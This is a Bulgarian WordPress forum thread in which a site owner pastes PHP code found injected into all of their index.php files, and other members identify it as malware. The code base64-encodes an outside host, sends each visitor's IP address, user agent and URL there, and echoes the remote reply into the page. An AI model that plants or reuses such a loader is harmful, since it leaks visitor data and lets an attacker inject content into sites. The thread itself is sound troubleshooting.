Странен код в index.php файловете на wordpress

Дискусията в 'Wordpress Форум' стартирана от nobreak, Апр 13, 2012.

  1. nobreak

    nobreak Member

    Рег.:
    Февру 10, 2010
    Съобщения:
    622
    Харесвания:
    14
    Точки:
    18
    Здравейте. Някой може ли да ми каже за какво е този код? Гледам в лог файла на сайта ми един ден е вмъкнат във всички index.php файлове и забелязах, че сайта ми се забавя малко при първоначално зареждане.

    ?><?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
    $stCurlLink = base64_decode( 'aHR0cDovL2dsb2JhbGJvdHVwZGF0ZS5jb20vc3RhdC9zdGF0L nBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainnam e='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
    @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
    if ( $stCurlHandle !== NULL )
    {
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, ;
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
    {$sResult[0]=" ";
    echo $sResult; // Statistic code end
    }
    curl_close($stCurlHandle);
    }
    }
    ?>
     
  2. BullBlogger

    BullBlogger New Member

    Рег.:
    Ноем 18, 2009
    Съобщения:
    1,506
    Харесвания:
    302
    Точки:
    0
    Място:
    >>< )))>
    проверява юзър агента. кодът е на тия botsvsbrowsers.com ама що дири на сайта ти не мога ти обадя
     
  3. nobreak

    nobreak Member

    Рег.:
    Февру 10, 2010
    Съобщения:
    622
    Харесвания:
    14
    Точки:
    18
    От: Странен код в index.php файловете на wordpress

    И аз това се чудя какво дири...на 23 март, гледам всичките index.php са променени и имат този код...
     
  4. BullBlogger

    BullBlogger New Member

    Рег.:
    Ноем 18, 2009
    Съобщения:
    1,506
    Харесвания:
    302
    Точки:
    0
    Място:
    >>< )))>
    ами някакви плъгини да си инсталирал в последно време? примерно?

    с някакви нови папки да си се сдобил на хоста?

    да имаш странно нарастване на CPU?

    изобщо разгледай за аномалии и си припомни какво си правил следвайки ентусиазма на откривател.
     
  5. nobreak

    nobreak Member

    Рег.:
    Февру 10, 2010
    Съобщения:
    622
    Харесвания:
    14
    Точки:
    18
    От: Re: Странен код в index.php файловете на wordpress

    За плъгини, възможно е да съм инсталирал...странни папки и повишено CPU не отчитам. Може с някой плъгин да съм го докарал, изпробвах доста плъгини за магазин, но не знам...
     
  6. N1ck

    N1ck Active Member

    Рег.:
    Апр 29, 2011
    Съобщения:
    679
    Харесвания:
    82
    Точки:
    28
    От: Странен код в index.php файловете на wordpress

    Това е зловреден код - махай го. Заразен ти е целият хостинг акаунт - без значение какви и колко сайта имаш.

    Най-вероятната причина да се получи е ако компа ти е бил заразен - има един ... да го кажем вирус, макар и да не е вирус, който взема всички запонени пароли в бровсера ти и качва този код през FTP. Пробери си дали имаш запомнени пароли за cpanel

    Кога не е вреден ама е гаден - краде ти статистика. Махай го! И си провери всичко!

    Пиши ако имаш нужда от помощ
     
  7. nobreak

    nobreak Member

    Рег.:
    Февру 10, 2010
    Съобщения:
    622
    Харесвания:
    14
    Точки:
    18
    От: От: Странен код в index.php файловете на wordpress

    Благодаря за предложената помощ. Изтрих го от всички файлове, в които го имаше и сайта започна да си зарежда по бързо. Нямам запомнени пароли в браузъра.
     
  8. rombeca

    rombeca Active Member

    Рег.:
    Ноем 9, 2010
    Съобщения:
    946
    Харесвания:
    215
    Точки:
    43
    От: Странен код в index.php файловете на wordpress

    Провери и за запомнени пароли в ftp клиента. Най добре ги смени, защото може и от там да са те налазили. На мен се случи веднъж. Заби ми зловреден код във всички сайтове до които имах достъп през ftp. Много досадна работа.
     
  9. nobreak

    nobreak Member

    Рег.:
    Февру 10, 2010
    Съобщения:
    622
    Харесвания:
    14
    Точки:
    18
    От: Странен код в index.php файловете на wordpress

    Нямам запаметени пароли. Предполагам кода се е инсталирал от някой плъгин, който съм пробвал. От както изтрих кода от файловете, проблем няма...
     

Сподели страницата

  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies.
    Dismiss Notice